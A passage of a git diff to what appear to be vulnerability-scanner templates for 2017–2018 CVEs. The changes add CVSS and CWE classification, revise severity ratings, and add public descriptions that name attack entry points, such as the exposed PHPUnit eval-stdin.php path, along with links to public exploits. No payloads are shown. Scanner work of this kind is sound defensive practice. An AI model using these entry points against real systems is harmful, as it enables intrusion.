https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 tags: cve,cve2017,mcafee,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index f7e9caec0e..75f2ff83e6 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -3,12 +3,17 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik - severity: info + severity: medium description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2017-5487 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 3421006395..7c792b2225 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -2,12 +2,17 @@ id: CVE-2017-5521 info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha - severity: medium + severity: high description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server. reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-5521 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index ad22c9704a..0d112f3194 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,11 @@ info: description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache reference: https://github.com/mazen160/struts-pwn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-5638 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index f9c76aab23..38352df854 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -3,9 +3,15 @@ id: CVE-2017-6090 info: name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,phpcollab,rce,fileupload reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." requests: - raw: diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 82e8e080d4..533586dd4f 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -9,6 +9,11 @@ info: - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py tags: cve,cve2017,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-7269 + cwe-id: CWE-119 requests: - method: OPTIONS diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index a3ebfb4f8d..b17e18d01d 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-7391 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index de43a2eddc..cadec418f8 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -15,6 +15,11 @@ info: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index d3dde0e997..5a1fbdfe03 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -2,12 +2,17 @@ id: CVE-2017-7921 info: name: Hikvision Authentication Bypass author: princechaddha - severity: high + severity: critical description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-7921 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index ccad58de39..a4968604e8 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -2,10 +2,15 @@ id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index cbd278de96..365d6c0957 100644 --- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2017,xss,telerik description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index da92a85868..843b3c84d2 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -7,6 +7,11 @@ info: description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9288 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 30ca442da3..d97ed4f5c8 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -3,13 +3,18 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF author: pdteam - severity: high + severity: medium description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 tags: cve,cve2017,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index 0b2bfa1813..a7acef344d 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -9,6 +9,11 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html tags: cve,cve2017,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9791 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 008a0df385..3fbcb5b5e2 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -3,12 +3,17 @@ id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu - severity: critical + severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index c2ae610bf1..10a07fec84 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -7,6 +7,11 @@ info: description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) tags: cve,cve2017,dotnetnuke,bypass reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 0a1de31159..bb1e917308 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random_Robbie,pikpikcu - severity: high + severity: critical description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI tags: cve,cve2017,php,phpunit,rce reference: @@ -11,6 +11,11 @@ info: - https://github.com/RandomRobbieBF/phpunit-brute - https://thephp.cc/articles/phpunit-a-security-risk - https://twitter.com/sec715/status/1411517028012158976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9841 + cwe-id: CWE-94 requests: diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml index 0aec140f4e..2bc87caa63 100644 --- a/cves/2018/CVE-2018-0296.yaml +++ b/cves/2018/CVE-2018-0296.yaml @@ -3,9 +3,15 @@ id: CVE-2018-0296 info: name: Cisco ASA path traversal vulnerability author: organiccrap - severity: medium + severity: high tags: cve,cve2018,cisco,lfi reference: https://github.com/yassineaboukir/CVE-2018-0296 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2018-0296 + cwe-id: CWE-22 + description: "A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029." requests: - method: GET diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml index 7e1a3a440a..9fc6a43150 100644 --- a/cves/2018/CVE-2018-1000129.yaml +++ b/cves/2018/CVE-2018-1000129.yaml @@ -3,9 +3,19 @@ id: CVE-2018-1000129 info: name: Jolokia XSS author: mavericknerd,0h1in9e - severity: high + severity: medium description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser. tags: cve,cve2018,jolokia,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-1000129 + cwe-id: CWE-79 + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad + - https://access.redhat.com/errata/RHSA-2018:2669 + - https://access.redhat.com/errata/RHSA-2018:3817 requests: - method: GET diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index 961e31302a..9421966f6e 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -6,6 +6,14 @@ info: severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. tags: cve,cve2018,jolokia,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-1000130 + cwe-id: CWE-74 + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://access.redhat.com/errata/RHSA-2018:2669 requests: - raw: diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index 4591ccbbf3..7532d878ce 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -7,6 +7,11 @@ info: description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user. reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 tags: rce,git,cve,cve2018,gitlist + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000533 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index 5b5e68d0d7..b244248f80 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml @@ -7,8 +7,13 @@ info: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ author: geeknik - severity: medium + severity: high tags: cve,cve2018,jenkins,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-1000600 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index 27841387a4..5dbeddcdaa 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 tags: cve,cve2018,jenkin,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000861 + cwe-id: CWE-502 + description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way." requests: - method: GET diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml index 99d22365ce..7c1ad45220 100644 --- a/cves/2018/CVE-2018-10095.yaml +++ b/cves/2018/CVE-2018-10095.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095 tags: cve,cve2018,xss,dolibarr + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-10095 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 0c21319c5d..fe677ff879 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 tags: globalprotect,xss,cve,cve2018,vpn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-10141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 572d3db315..d93affb5d4 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 tags: cve,cve2018,lfi,router,dlink + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-10822 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml index 3825c9357d..888187304c 100644 --- a/cves/2018/CVE-2018-11409.yaml +++ b/cves/2018/CVE-2018-11409.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 tags: cve,cve2018,splunk + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-11409 + cwe-id: CWE-200 + description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key." requests: - method: GET diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index b71a5826b6..a5c31e20e5 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -7,6 +7,11 @@ info: description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-11709 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml index edf69a2714..124b5bd839 100644 --- a/cves/2018/CVE-2018-11759.yaml +++ b/cves/2018/CVE-2018-11759.yaml @@ -3,9 +3,15 @@ id: CVE-2018-11759 info: name: Apache Tomcat JK Status Manager Access author: harshbothra_ - severity: medium + severity: high reference: https://github.com/immunIT/CVE-2018-11759 tags: cve,cve2018,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-11759 + cwe-id: CWE-22 + description: "The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical." requests: - method: GET diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index ef2fb19d90..98bff06e5c 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -3,9 +3,15 @@ id: CVE-2018-11776 info: name: Apache Struts2 S2-057 RCE author: pikpikcu - severity: critical + severity: high reference: https://github.com/jas502n/St2-057 tags: cve,cve2018,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11776 + cwe-id: CWE-20 + description: "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace." requests: - method: GET diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 65862adf48..ec8276c693 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -7,6 +7,11 @@ info: reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E severity: medium tags: tomcat,redirect,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2018-11784 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 35dcc2c5d4..f5ecf6d832 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -3,13 +3,18 @@ id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo - severity: high + severity: critical description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12031 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index b7b8cecbc5..2d01313840 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml @@ -14,6 +14,11 @@ info: https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py tags: cve,cve2018,dell,injection,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1207 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index eb04127534..202b897b33 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 tags: cve,cve2018,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2018-12095 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-1247.yaml b/cves/2018/CVE-2018-1247.yaml index bfecc86952..c040304736 100644 --- a/cves/2018/CVE-2018-1247.yaml +++ b/cves/2018/CVE-2018-1247.yaml @@ -3,8 +3,19 @@ id: CVE-2018-1247 info: name: RSA Authentication Manager XSS author: madrobot - severity: medium + severity: high tags: cve,cve2018,xss,flash + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H + cvss-score: 7.10 + cve-id: CVE-2018-1247 + cwe-id: CWE-611 + description: "RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application." + reference: + - http://seclists.org/fulldisclosure/2018/May/18 + - http://www.securitytracker.com/id/1040835 + - http://www.securityfocus.com/bid/104107 + - https://www.exploit-db.com/exploits/44634/ requests: - method: GET diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index 59af7e6d53..40bfe42ba7 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml @@ -3,9 +3,15 @@ id: CVE-2018-12613 info: name: PhpMyAdmin 4.8.1 Remote File Inclusion author: pikpikcu - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 tags: cve,cve2018,phpmyadmin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a 